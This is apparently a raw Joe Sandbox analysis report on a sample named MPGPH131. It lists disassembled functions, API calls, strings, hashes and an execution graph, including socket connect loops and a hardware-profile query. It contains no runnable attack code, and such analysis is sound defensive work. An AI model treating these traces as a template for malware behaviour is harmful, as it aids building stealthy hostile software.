                                  • Opcode ID: de9b0beaf0c31a1849f1b1de3cbfb95ff9c819868aea62588a721d15b04d0c63
                                  • Instruction ID: 044add508d373b559c9799e984781c5974994fb66bd76a9c56fde9910f1886db
                                  • Opcode Fuzzy Hash: de9b0beaf0c31a1849f1b1de3cbfb95ff9c819868aea62588a721d15b04d0c63
                                  • Instruction Fuzzy Hash: C8418234A002099BCF10DF68C889A9EBFF5EF45354F1481E5E9189B3D2D731AE59CB91
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A8DE93
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A8DEB6
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A8DED6
                                  • std::_Facet_Register.LIBCPMT ref: 00A8DF4B
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A8DF63
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00A8DF7B
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: 7815a26a62ced9cc1d764f18a0e433352cc5e78e41fa278eb2a25910f52ba060
                                  • Instruction ID: aa84ed0369359858202eb05785f489729111ed1578c4f501208826498a4b7252
                                  • Opcode Fuzzy Hash: 7815a26a62ced9cc1d764f18a0e433352cc5e78e41fa278eb2a25910f52ba060
                                  • Instruction Fuzzy Hash: 0641E2719002199FCB15EF98E941BAEBBB4FF05720F144269F9169B392DB31AD00CBD1
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00A24F72
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00A24FFF
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A250C8
                                  Strings
                                  • recursive_directory_iterator::operator++, xrefs: 00A2504C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy$___std_exception_copy
                                  • String ID: recursive_directory_iterator::operator++
                                  • API String ID: 1206660477-953255998
                                  • Opcode ID: 433eaa9924e5ea96df7bad2a806208e7f28bc10f3e5cac5d86dbf5318dc499ef
                                  • Instruction ID: 7bc7670565e4c664d09267f64286b274b2fed6e87ee07c9e9e45033acb4c1696
                                  • Opcode Fuzzy Hash: 433eaa9924e5ea96df7bad2a806208e7f28bc10f3e5cac5d86dbf5318dc499ef
                                  • Instruction Fuzzy Hash: 0BE126719002149FDB28DF68E945BAEFBF9FF48700F108A2DE45697781E774A904CBA1
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A2799A
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A27B75
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: out_of_range$type_error
                                  • API String ID: 2659868963-3702451861
                                  • Opcode ID: c6a4f167d4544579af9cf17a68f4c11f5f18efadc715fd545f60574130c1bf44
                                  • Instruction ID: 8249b16e414a9b00cabd117bfc2b77ec49489fa8438d1a8c0db7d0fb0361b50f
                                  • Opcode Fuzzy Hash: c6a4f167d4544579af9cf17a68f4c11f5f18efadc715fd545f60574130c1bf44
                                  • Instruction Fuzzy Hash: 8FC168B19002189FDB18CFACE984B9DBBF1FF49310F148669E419EB791E7749A80CB51
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00A275BE
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00A275CD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: at line $, column
                                  • API String ID: 4194217158-191570568
                                  • Opcode ID: e443bb6603405c4ef2fcb47cd30f78f8495b6f4a7d9d35eb2c713d27f2c67488
                                  • Instruction ID: 3facbc8b6b9659cc5a3b40a7dc53187ee8bec303fe0b93fd58db1306d8d68f0d
                                  • Opcode Fuzzy Hash: e443bb6603405c4ef2fcb47cd30f78f8495b6f4a7d9d35eb2c713d27f2c67488
                                  • Instruction Fuzzy Hash: 0561D171A042199FDB08DF68ED85BADBBB6FF49300F244668E415A7B81D774AA408B90
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A23E7F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 2659868963-1866435925
                                  • Opcode ID: 46c5e69cfa72c0f8b2ece5bbebf8024a1e3c44dffe1bbeaa2a6dba273868ec52
                                  • Instruction ID: 67546f197f3e11b98936be54c3cee34a6c83147bb74e58729a84502d60d2e73f
                                  • Opcode Fuzzy Hash: 46c5e69cfa72c0f8b2ece5bbebf8024a1e3c44dffe1bbeaa2a6dba273868ec52
                                  • Instruction Fuzzy Hash: BB41D8B2900214AFCB14DF5CD845BAEBBF8EF49710F14857AF919E7741E774AA048BA0
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A23E7F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 2659868963-1866435925
                                  • Opcode ID: c7e352f8c7829c4aa3731c036376889265933d0bc91bf71a7a2c10ad613fe142
                                  • Instruction ID: 075e09200c7e0ff3f113926b7b8cc7257ebc2ed375f766e92b029fbac1115e34
                                  • Opcode Fuzzy Hash: c7e352f8c7829c4aa3731c036376889265933d0bc91bf71a7a2c10ad613fe142
                                  • Instruction Fuzzy Hash: 3921EBB39003156FCB14EF5CE805BA6B7F8AF05310F18887AFA6897641E774EA14CB95
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A27340
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: parse error$parse_error
                                  • API String ID: 2659868963-1820534363
                                  • Opcode ID: 11ccaa8c6ebb6a61c6e46303caf5fb4812212a756c602575f674647510076497
                                  • Instruction ID: f16de575762f1d08cafc519b6641e8dee7674a5916db6d504cfeb3f819a43f06
                                  • Opcode Fuzzy Hash: 11ccaa8c6ebb6a61c6e46303caf5fb4812212a756c602575f674647510076497
                                  • Instruction Fuzzy Hash: 8BE160709042188FDB18CF68D985B9DBBF1FF49300F2482A9E419EB792D7749A85CF51
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00A26F11
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00A26F20
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: [json.exception.
                                  • API String ID: 4194217158-791563284
                                  • Opcode ID: 68304d1e9aa675b444076e5cccc6eb4774de033f66e11ff63697c237b314d1fa
                                  • Instruction ID: 2ace2e93c2d10f4cf5238c2f0110c62c2117403875e2d56bd185a894a95a7433
                                  • Opcode Fuzzy Hash: 68304d1e9aa675b444076e5cccc6eb4774de033f66e11ff63697c237b314d1fa
                                  • Instruction Fuzzy Hash: 9391C570A012189FDB18CF6CD984B9EBBF6FF49300F20856DE415AB792D775A941CB50
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00A9E491
                                  Strings
                                  • type must be boolean, but is , xrefs: 00A9E582
                                  • type must be string, but is , xrefs: 00A9E4F8
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID: type must be boolean, but is $type must be string, but is
                                  • API String ID: 118556049-436076039
                                  • Opcode ID: a36e9888bbe68c14138cbd4c6609129b146156e1ba4c066c2b53cef137eb5d62
                                  • Instruction ID: 064ee365e07999a85fb30b18bf8d3dab7f3e7649a1eb1350690e3812f0cb61ed
                                  • Opcode Fuzzy Hash: a36e9888bbe68c14138cbd4c6609129b146156e1ba4c066c2b53cef137eb5d62
                                  • Instruction Fuzzy Hash: CF415EB1A00248AFDB14EBA4E902B9EB7E8DB14710F1446B4F419D7792EB35EE44C792

                                  Execution Graph

                                  Execution Coverage:3.2%
                                  Dynamic/Decrypted Code Coverage:1.3%
                                  Signature Coverage:0%
                                  Total number of Nodes:535
                                  Total number of Limit Nodes:64
                                  execution_graph 19884 50e09cf 19885 50e09d3 GetCurrentHwProfileW 19884->19885 19887 50e0b4e 19885->19887 18812 2de0a0 WSAStartup 18813 2de0d8 18812->18813 18817 2de1a7 18812->18817 18814 2de175 socket 18813->18814 18813->18817 18815 2de18b connect 18814->18815 18814->18817 18816 2de19d closesocket 18815->18816 18815->18817 18816->18814 18816->18817 18166 3ad168 18167 3ad17b ___std_exception_copy 18166->18167 18172 3acf4a 18167->18172 18169 3ad190 18180 3a44dc 18169->18180 18173 3acf58 18172->18173 18179 3acf80 18172->18179 18174 3acf87 18173->18174 18175 3acf65 18173->18175 18173->18179 18186 3acea3 18174->18186 18190 3a4723 18175->18190 18178 3acfbf 18178->18169 18179->18169 18181 3a44e8 18180->18181 18182 3a4587 ___std_exception_copy RtlAllocateHeap 18181->18182 18184 3a44ff 18181->18184 18182->18184 18183 3a4512 18184->18183 18185 3a4587 ___std_exception_copy RtlAllocateHeap 18184->18185 18185->18183 18187 3aceaf __fread_nolock 18186->18187 18197 3acefe 18187->18197 18189 3aceca 18189->18178 18191 3a4733 18190->18191 18193 3a473a ___std_exception_copy __Getctype 18190->18193 18192 3a4541 ___std_exception_copy RtlAllocateHeap 18191->18192 18192->18193 18194 3a4748 18193->18194 18195 3a46ec ___std_exception_copy RtlAllocateHeap 18193->18195 18194->18179 18196 3a47ac 18195->18196 18196->18179 18204 3b8644 18197->18204 18224 3b8606 18204->18224 18206 3acf16 18211 3acfc1 18206->18211 18207 3b8655 18207->18206 18231 3b6e2d 18207->18231 18212 3acf34 18211->18212 18215 3acfd3 18211->18215 18220 3b86ef 18212->18220 18213 3acfe1 18214 3a4723 ___std_exception_copy RtlAllocateHeap 18213->18214 18214->18212 18215->18212 18215->18213 18216 3ad017 std::locale::_Locimp::_Locimp 18215->18216 18216->18212 18218 3b5f82 __fread_nolock RtlAllocateHeap 18216->18218 18292 3a55d3 18216->18292 18298 3b538b 18216->18298 18218->18216 18221 3b86fa 18220->18221 18223 3acf40 18220->18223 18222 3a55d3 4 API calls 18221->18222 18221->18223 18222->18223 18223->18189 18226 3b8612 18224->18226 18225 3b863c 18225->18207 18226->18225 18241 3b5f82 18226->18241 18228 3b862d 18248 3c0d44 18228->18248 18230 3b8633 18230->18207 18232 3b6e6b 18231->18232 18236 3b6e3b __Getctype std::_Facet_Register 18231->18236 18233 3ad23f __dosmaperr RtlAllocateHeap 18232->18233 18235 3b6e69 18233->18235 18234 3b6e56 RtlAllocateHeap 18234->18235 18234->18236 18237 3b6db3 18235->18237 18236->18232 18236->18234 18238 3b6de8 18237->18238 18239 3b6dbe __dosmaperr 18237->18239 18238->18206 18239->18238 18240 3ad23f __dosmaperr RtlAllocateHeap 18239->18240 18240->18238 18242 3b5f8e 18241->18242 18243 3b5fa3 18241->18243 18257 3ad23f 18242->18257 18243->18228 18249 3c0d5e 18248->18249 18250 3c0d51 18248->18250 18252 3c0d6a 18249->18252 18253 3ad23f __dosmaperr RtlAllocateHeap 18249->18253 18251 3ad23f __dosmaperr RtlAllocateHeap 18250->18251 18254 3c0d56 18251->18254 18252->18230 18255 3c0d8b 18253->18255 18254->18230 18256 3a47a0 ___std_exception_copy RtlAllocateHeap 18255->18256 18256->18254 18263 3b5d2c 18257->18263 18260 3a47a0 18286 3a46ec 18260->18286 18264 3b5d35 __Getctype 18263->18264 18272 3ad244 18264->18272 18274 3b63f3 18264->18274 18266 3b5d79 __Getctype 18267 3b5db9 18266->18267 18268 3b5d81 __Getctype 18266->18268 18278 3b5a09 18267->18278 18270 3b6db3 ___std_exception_destroy RtlAllocateHeap 18268->18270 18270->18272 18272->18260 18273 3b6db3 ___std_exception_destroy RtlAllocateHeap 18273->18272 18277 3b6400 __Getctype std::_Facet_Register 18274->18277 18275 3b642b RtlAllocateHeap 18276 3b643e __dosmaperr 18275->18276 18275->18277 18276->18266 18277->18275 18277->18276 18279 3b5a77 __Getctype 18278->18279 18282 3b59af 18279->18282 18281 3b5aa0 18281->18273 18283 3b59bb __fread_nolock std::_Lockit::_Lockit 18282->18283 18284 3b5b90 __Getctype RtlAllocateHeap 18283->18284 18285 3b59dd __Getctype 18284->18285 18285->18281 18287 3a46fe ___std_exception_copy 18286->18287 18288 3a4723 ___std_exception_copy RtlAllocateHeap 18287->18288 18289 3a4716 18288->18289 18290 3a44dc ___std_exception_copy RtlAllocateHeap 18289->18290 18291 3a4721 18290->18291 18291->18228 18293 3a55ec 18292->18293 18297 3a5613 18292->18297 18294 3b5f82 __fread_nolock RtlAllocateHeap 18293->18294 18293->18297 18295 3a5608 18294->18295 18296 3b538b 4 API calls 18295->18296 18296->18297 18297->18216 18301 3b5397 __fread_nolock 18298->18301 18299 3b539f 18299->18216 18300 3b53d8 18302 3a4723 ___std_exception_copy RtlAllocateHeap 18300->18302 18301->18299 18301->18300 18303 3b541e 18301->18303 18302->18299 18303->18299 18305 3b549c 18303->18305 18306 3b54c4 18305->18306 18318 3b54e7 __fread_nolock 18305->18318 18307 3b54c8 18306->18307 18309 3b5523 18306->18309 18308 3a4723 ___std_exception_copy RtlAllocateHeap 18307->18308 18308->18318 18310 3b5541 18309->18310 18324 3ae17d 18309->18324 18319 3b4fe1 18310->18319 18314 3b5559 18314->18318 18327 3b4bb2 18314->18327 18315 3b55a0 18316 3b5609 WriteFile 18315->18316 18315->18318 18316->18318 18318->18299 18320 3c0d44 __fread_nolock RtlAllocateHeap 18319->18320 18321 3b4ff3 18320->18321 18322 3b5021 18321->18322 18333 3a9d10 18321->18333 18322->18314 18322->18315 18379 3ae05c 18324->18379 18326 3ae196 18326->18310 18328 3b4c1a 18327->18328 18329 3a9d10 std::_Locinfo::_Locinfo_dtor 2 API calls 18328->18329 18332 3b4c2b std::_Locinfo::_Locinfo_dtor std::locale::_Locimp::_Locimp 18328->18332 18329->18332 18330 3b84be RtlAllocateHeap RtlAllocateHeap 18330->18332 18331 3b4ee1 _ValidateLocalCookies 18331->18318 18331->18331 18332->18330 18332->18331 18340 3a4587 18333->18340 18341 3a459a 18340->18341 18342 3a4591 18340->18342 18347 3b5ef3 18341->18347 18355 3a4541 18342->18355 18348 3b5f0a 18347->18348 18349 3a9d3d 18347->18349 18348->18349 18365 3bf4f3 18348->18365 18351 3b5f51 18349->18351 18352 3a9d4a 18351->18352 18353 3b5f68 18351->18353 18352->18322 18353->18352 18374 3bd81e 18353->18374 18356 3a4550 18355->18356 18357 3b5ddd ___std_exception_copy RtlAllocateHeap 18356->18357 18358 3a4572 18357->18358 18358->18341 18359 3b0259 18358->18359 18360 3b025e std::locale::_Setgloballocale 18359->18360 18361 3bc7c6 std::locale::_Setgloballocale RtlAllocateHeap 18360->18361 18364 3b0269 std::locale::_Setgloballocale 18360->18364 18361->18364 18362 3af224 std::locale::_Setgloballocale RtlAllocateHeap 18363 3b029c 18362->18363 18364->18362 18366 3bf4ff __fread_nolock 18365->18366 18367 3b5bdb __Getctype RtlAllocateHeap 18366->18367 18368 3bf508 std::_Lockit::_Lockit 18367->18368 18369 3bf574 __Getctype RtlAllocateHeap 18368->18369 18371 3bf54e 18368->18371 18370 3bf537 __Getctype 18369->18370 18370->18371 18372 3b0259 __Getctype RtlAllocateHeap 18370->18372 18371->18349 18373 3bf573 18372->18373 18375 3b5bdb __Getctype RtlAllocateHeap 18374->18375 18376 3bd823 18375->18376 18377 3bd736 std::_Locinfo::_Locinfo_dtor RtlAllocateHeap RtlAllocateHeap 18376->18377 18378 3bd82e 18377->18378 18378->18352 18384 3ba6de 18379->18384 18381 3ae06e 18382 3ae08a SetFilePointerEx 18381->18382 18383 3ae076 __fread_nolock 18381->18383 18382->18383 18383->18326 18385 3ba6eb 18384->18385 18386 3ba700 18384->18386 18397 3ad22c 18385->18397 18388 3ad22c __dosmaperr RtlAllocateHeap 18386->18388 18392 3ba725 18386->18392 18390 3ba730 18388->18390 18393 3ad23f __dosmaperr RtlAllocateHeap 18390->18393 18391 3ad23f __dosmaperr RtlAllocateHeap 18394 3ba6f8 18391->18394 18392->18381 18395 3ba738 18393->18395 18394->18381 18396 3a47a0 ___std_exception_copy RtlAllocateHeap 18395->18396 18396->18394 18398 3b5d2c __dosmaperr RtlAllocateHeap 18397->18398 18399 3ad231 18398->18399 18399->18391 18155 50e0b3f 18157 50e0aa6 18155->18157 